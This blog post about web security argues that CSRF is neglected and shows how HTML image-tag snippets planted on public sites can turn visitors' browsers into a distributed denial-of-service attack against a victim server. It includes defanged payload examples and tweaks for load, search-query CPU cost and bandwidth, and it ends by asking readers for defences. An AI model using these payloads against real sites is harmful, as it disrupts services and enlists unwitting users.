Before getting into the focus of the post I’d like to provide some background:
CSRF, like XSS, is one of web application security industries skeletons in the closet. Over the years only a precious few industry insiders were aware of CSRF and appreciated its significance. The larger infosec industry discounted CSRF (and XSS) because it wasn’t “elite” enough for their taste as it didn’t enable “root” access. All attention was instead placed on various types of buffer overflows, which is important, but not exclusively so. Web security experts on the other hand tend not to care about getting root on boxes because all the value is now within the browser walls. Why hack someone’s machine when its easier to go after a Web bank/email/brokerage directly?
Even today on this very blog are comments saying, “XSS is not hacking, get some real exploits”, and I’m sure most readers here have encountered similar attitudes elsewhere. It’s this type arrogance and closed mindedness that got us into this mess and why maybe 20% of infosec conference audiences have even heard of CSRF. Developer audiences it’s lesser still. As a result we’re faced with a situation where millions of websites are already built (and vulnerable) where developers never considered CSRF protection because they didn’t know it existed. Browser vendor are trying to figure out what to do and likely years off from meaningful results. And now the bad guys have recently caught on and beginning to cause real damage.
It’s with this context in mind that I share my thoughts about DDoS attacks carried out by way of CSRF. Also, I take no credit for the novelty of this attack as its been rumored around in various circles for years. I’m merely drawing attention to the issue. Here’s the basic exploit code that a bad guy would need:
<* IMG SRC=”http://victim/” >
Simple enough? All the bad guy needs to do is post the HTML snippet to a large number of public websites where other users would come in contact with it. These websites could be message boards, guest books, WebMail, blog comments, social networks, chat rooms, and so on. All the types of websites quite popular, free to sign-up, and easy to automate (save for CAPTCHA). The code instructs a users browser to make an HTTP request to an arbitrary location (victim) invisibly and behind the scenes with connections originating from all over. This makes the attack difficult to stop and obviously the more frequented the websites are the more effective it is.
Want increase the number of connections per user? Just multiply the number of injections per page, probably maxing out right around 10 or so per user. I’ve tested this across a dozen websites simultaneously reaching about 200 requests per second on the target web server. Something more automated and advanced could easily surpass what I was able to accomplish.
Want to increase the per request CPU processing of the target? Target the search application using several keywords separated “AND” operators, like so:
<* IMG SRC=”http://victim/search?q=TERM1+AND+TERM2+AND+TERM3 …” >
Want suck up a lot more bandwidth? Try URLs that are 2K or so in size:
<* IMG SRC=”http://victim/AAA…” >
Want to scrub the referers from the requests? There are tricks for that to. Anyway, you get the idea. Anyone have any bright ideas on what a defense might be?